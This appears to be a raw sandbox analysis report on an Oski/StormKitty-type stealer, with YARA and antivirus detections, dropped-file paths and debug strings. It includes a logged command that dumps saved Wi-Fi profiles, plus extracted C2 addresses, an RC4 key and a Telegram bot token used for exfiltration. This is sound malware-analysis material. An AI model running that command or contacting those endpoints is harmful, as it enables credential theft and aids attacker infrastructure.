6.2.chormuimii.exe.4bb6362.12.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
8.2.chormuim.exe.730000.1.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x6ecd1:$name: ConfuserEx 0x6db7b:$compile: AssemblyTitle
8.2.chormuim.exe.730000.1.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x6fa87:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
8.0.chormuim.exe.280000.2.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
8.0.chormuim.exe.280000.2.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4ba0f62.13.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x63e3b:$name: ConfuserEx 0x7b2a:$compile: AssemblyTitle 0x63b46:$compile: AssemblyTitle
6.2.chormuimii.exe.4ba0f62.13.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x63fdb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4ba0f62.13.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
4.2.svchoste.exe.b70000.0.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.2397f90.3.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x66a3b:$name: ConfuserEx 0x972a:$compile: AssemblyTitle 0x66746:$compile: AssemblyTitle
6.2.chormuimii.exe.2397f90.3.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x66bdb:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.2397f90.3.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.4c0fb62.11.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.23ad390.2.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x4f83b:$name: ConfuserEx 0x4f546:$compile: AssemblyTitle
6.2.chormuimii.exe.23ad390.2.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x4f9db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
8.0.chormuim.exe.730000.4.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x6ecd1:$name: ConfuserEx 0x6db7b:$compile: AssemblyTitle
8.0.chormuim.exe.730000.4.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x6fa87:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
8.0.chormuim.exe.280000.1.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0x51346:$compile: AssemblyTitle
8.0.chormuim.exe.280000.1.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4ba0000.14.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x6799d:$name: ConfuserEx 0xa68c:$compile: AssemblyTitle 0x676a8:$compile: AssemblyTitle
6.2.chormuimii.exe.4ba0000.14.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x67b3d:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.4ba0000.14.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12bfa128.4.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
6.2.chormuimii.exe.36cb892.6.raw.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x5163b:$name: ConfuserEx 0xf34f9:$name: ConfuserEx 0x51346:$compile: AssemblyTitle 0x961e8:$compile: AssemblyTitle 0xf3204:$compile: AssemblyTitle
6.2.chormuimii.exe.36cb892.6.raw.unpack	HKTL_NET_GUID_StormKitty	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x517db:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d 0xf3699:$typelibguid0: a16abbb4-985b-4db2-a80c-21268b26c73d
6.2.chormuimii.exe.36cb892.6.raw.unpack	JoeSecurity_Oski	Yara detected Oski Stealer	Joe Security
Click to see the 97 entries

Sigma Overview

Stealing of Sensitive Information:

Sigma detected: Capture Wi-Fi password

Show sources

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\chormuim.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\chormuim.exe, ParentProcessId: 6504, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 5880

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	Avira: detection malicious, Label: TR/Agent.pyynm
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\ProgramData\AMD Driver\taskshell.exe	Avira: detection malicious, Label: HEUR/AGEN.1124739
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Avira: detection malicious, Label: HEUR/AGEN.1209556
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Avira: detection malicious, Label: TR/AD.Chapak.dvwuj

Found malware configuration

Show sources

Source: 6.2.chormuimii.exe.4af0000.10.unpack	Malware Configuration Extractor: Oski {"C2 url": "aegismd.ca/cgi/", "RC4 Key": "056139954853430408"}
Source: 6.2.chormuimii.exe.4af0000.10.unpack	Malware Configuration Extractor: Vidar {"C2 url": "aegismd.ca/cgi/", "RC4 Key": "056139954853430408"}
Source: chormuim.exe.6504.8.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/sendMessage"}

Multi AV Scanner detection for submitted file

Show sources

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Virustotal: Detection: 70%	Perma Link
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Metadefender: Detection: 31%	Perma Link
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	ReversingLabs: Detection: 74%

Antivirus / Scanner detection for submitted sample

Show sources

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Avira: detected

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\AMD Driver\taskshell.exe	Metadefender: Detection: 40%	Perma Link
Source: C:\ProgramData\AMD Driver\taskshell.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	Metadefender: Detection: 43%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	ReversingLabs: Detection: 75%

Machine Learning detection for sample

Show sources

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\AMD Driver\taskshell.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Joe Sandbox ML: detected

Source: 5.2.dll.exe.10000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 6.0.chormuimii.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 6.2.chormuimii.exe.4b5ec00.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.2.chormuimii.exe.2406b90.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.dll.exe.10000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 6.2.chormuimii.exe.4c0fb62.11.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8CB10 CryptUnprotectData,LocalAlloc,LocalFree,	4_2_00B8CB10
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8C900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	4_2_00B8C900
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8CBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	4_2_00B8CBA0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8CD30 _malloc,_malloc,CryptUnprotectData,	4_2_00B8CD30
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8EED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	4_2_00B8EED0
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Code function: 8_2_00007FFC089D5ED9 CryptUnprotectData,	8_2_00007FFC089D5ED9

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49747 version: TLS 1.2

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: NapiNSP.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: pnrpnsp.pdbO source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source:	Binary string: System.Configuration.ni.pdbNW source: WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdbU source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb0 source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: schannel.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.376804497.0000026D6FE62000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: msvcrt.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbo source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: i.pdb source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb{ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr
Source:	Binary string: ole32.pdba source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: edputil.pdbc source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: kernelbase.pdb0 source: WerFault.exe, 0000001D.00000003.377311889.0000026D6FDDC000.00000004.00000001.sdmp
Source:	Binary string: gdiplus.pdbX source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: WLDP.pdbG source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: clrjit.pdbD source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rasadhlp.pdbR source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS5 source: WER5768.tmp.dmp.29.dr
Source:	Binary string: nsi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ source: WER5768.tmp.dmp.29.dr
Source:	Binary string: _.pdbHD source: chormuimii.exe, 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, chormuimii.exe, 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, chormuimii.exe, 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp
Source:	Binary string: gpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbq source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: NapiNSP.pdb[ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: msvcp140.i386.pdbGCTL source: svchoste.exe, 00000004.00000003.306645593.000000000389F000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.307329985.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.306386681.0000000003821000.00000004.00000001.sdmp, msvcp140.dll.4.dr
Source:	Binary string: mscorlib.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: winrnr.pdb: source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdbO_ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WER5768.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER5768.tmp.dmp.29.dr
Source:	Binary string: dpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: psapi.pdbz source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, freebl3.dll.4.dr
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: kernelbase.pdb source: WerFault.exe, 0000001D.00000003.377311889.0000026D6FDDC000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WER5768.tmp.dmp.29.dr
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: winnsi.pdbL source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.4.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK source: chormuim.exe, 00000008.00000003.350829566.000000001B765000.00000004.00000001.sdmp
Source:	Binary string: vaultcli.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: sspicli.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb0 source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp
Source:	Binary string: rpcrt4.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: symbols\dll\mscorlib.pdbpdb0x source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: rasapi32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ntasn1.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb/ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wmiutils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemsvc.pdb8 source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: clr.pdbM source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: %mscorlib.ni.pdb source: WerFault.exe, 0000001D.00000002.398156992.0000026D703B7000.00000004.00000001.sdmp
Source:	Binary string: gdi32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdb} source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb^ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: ncryptsslp.pdbe source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: fastprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemsvc.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: winrnr.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: clr.pdb0 source: WerFault.exe, 0000001D.00000003.377203232.0000026D6FE56000.00000004.00000001.sdmp
Source:	Binary string: user32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: vcruntime140.i386.pdb source: svchoste.exe, 00000004.00000003.312315900.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.312994791.0000000003827000.00000004.00000001.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: fastprox.pdbW source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
